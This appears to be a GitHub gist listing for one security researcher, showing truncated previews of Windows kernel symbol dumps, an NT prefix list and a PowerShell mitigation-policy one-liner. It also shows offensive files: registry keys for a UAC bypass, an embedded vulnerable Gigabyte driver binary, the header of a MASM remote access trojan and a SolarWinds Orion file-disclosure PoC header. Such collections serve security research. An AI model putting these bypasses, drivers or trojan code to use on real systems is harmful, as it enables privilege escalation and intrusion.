joshfinley
/ ntIoFunctions.txt
Created
March 17, 2020 15:16
Windows native I/O manager support functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 2: kd> x nt!Io* | |
| fffff800`3e820158 nt!IopStoreArcInformation (void) | |
| fffff800`3df1ee6c nt!IopCheckListForCancelableIrp (void) | |
| fffff800`3e56ebc4 nt!IopInitializeCrashDump (void) | |
| fffff800`3df74b50 nt!IoCsqRemoveIrp (void) | |
| fffff800`3e560a70 nt!IopPortAddAllocation (void) | |
| fffff800`3df164f0 nt!IoReleaseRemoveLockEx (void) | |
| fffff800`3df95750 nt!IoAllocateDriverObjectExtension (void) | |
| fffff800`3e446f34 nt!IopQueryNameInternal (void) | |
| fffff800`3ded49b0 nt!IoReportTargetDeviceChangeAsynchronous (void) |
joshfinley
/ ntprefixes.txt
Created
March 17, 2020 15:17
List of NT prefixes - sourced from https://community.osr.com/discussion/72000/meaning-of-the-function-prefices
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Cc = Cache manager (???) | |
| Csr = Client Server support functions(LPC; related: CSRSS.EXE) | |
| Dbg = Debugger support functions | |
| Etw = Extended tracing ... support functions (???) | |
| Ex = Executive | |
| Fs = File system support functions | |
| Hal = Hardware abstraction layer functions | |
| Inbv = Something like: _In_itial _B_oot _V_ideo functions (???) | |
| Io = I/O manager support functions | |
| Kd = Kernel debugger support functions |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 2: kd> uf nt!IopLoadDriver | |
| nt!IopLoadDriver: | |
| fffff800`3e510744 48895c2410 mov qword ptr [rsp+10h],rbx | |
| fffff800`3e510749 55 push rbp | |
| fffff800`3e51074a 56 push rsi | |
| fffff800`3e51074b 57 push rdi | |
| fffff800`3e51074c 4154 push r12 | |
| fffff800`3e51074e 4155 push r13 | |
| fffff800`3e510750 4156 push r14 | |
| fffff800`3e510752 4157 push r15 |
joshfinley
/ Get-MitigationPolicies.ps1
Created
March 18, 2020 03:18
One-liner for getting mitigation policies for all running processes on the system
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-Process | foreach { Get-ProcessMitigation -Id $_.Id } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| fffff802`17beb644 dxgkrnl!ADAPTER_DISPLAY::IsPointerVisible (void) | |
| fffff802`17beb4f4 dxgkrnl!ADAPTER_DISPLAY::MarkCommitVidPnOnModeChange (void) | |
| fffff802`17d09df4 dxgkrnl!ADAPTER_DISPLAY::GetCddAllocationHandles (void) | |
| fffff802`17d23e74 dxgkrnl!ADAPTER_DISPLAY::ReleaseAllVidPnSourceOwners (void) | |
| fffff802`17ca23a0 dxgkrnl!ADAPTER_RENDER::ResumeScheduler (void) | |
| fffff802`17cfb94c dxgkrnl!ADAPTER_DISPLAY::CreateCddAllocations (void) | |
| fffff802`17d1a01c dxgkrnl!ADAPTER_DISPLAY::UpdateOneCddPrimaryPrivateDriverData (void) | |
| fffff802`17bda040 dxgkrnl!auto_ptr<DMMVIDEOPRESENTSOURCE>::~auto_ptr<DMMVIDEOPRESENTSOURCE> (void) | |
| fffff802`17bd3208 dxgkrnl!ADAPTER_DISPLAY::GetDisplayId (void) | |
| fffff802`17cd4d80 dxgkrnl!ADAPTER_DISPLAY::DisableOverlayPlanes (void) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 00000001`80002850 gdi32!GdiReleaseDC (void) | |
| 00000001`80001200 gdi32!hGetPEBHandle (void) | |
| 00000001`80001b90 gdi32!InternalDeleteObject (void) | |
| 00000001`80004640 gdi32!pldcGet (void) | |
| 00000001`80004bb0 gdi32!bDeleteLDC (void) | |
| 00000001`800020c0 gdi32!InternalDeleteDC (void) | |
| 00000001`800029f0 gdi32!GetDeviceCaps (void) | |
| 00000001`80001370 gdi32!CombineRgn (void) | |
| 00000001`80003970 gdi32!Gdi32DllInitialize (void) | |
| 00000001`800018b0 gdi32!SetRectRgn (void) |
joshfinley
/ SLuiUACbypass.reg
Created
September 11, 2020 17:48
— forked from homjxi0e/SLuiUACbypass.reg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings] | |
| @="Open" | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings\Shell] | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings\Shell\Open] | |
| @="Open" | |
| "MuiVerb"="@appresolver.dll,-8501" |
joshfinley
/ gigabyte_vulnerable_driver.h
Created
September 12, 2020 15:19
Vulnerable Gigabyte driver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Source: https://github.com/hoangprod/DanSpecial/blob/master/DanSpecial/Gigabytes.h | |
| unsigned char rawData[26192] = { | |
| 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, | |
| 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0xD8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, | |
| 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; <callisto.asm> - Callisto source | |
| ; Copyright (c) 2020 by Josh Finley. | |
| ; | |
| ; This file demonstrates a MASM-64 remote acess trojan. | |
| ; | |
| ; The author assumes no responsibility for any damage caused by this | |
| ; program, incidental or otherwise. This program is intended for | |
| ; research purposes only. | |
| ; | |
| ; References: |
joshfinley
/ CVE-2020-10148.py
Created
December 28, 2020 16:45
— forked from 0xsha/Solarwinds_Orion_LFD.py
CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |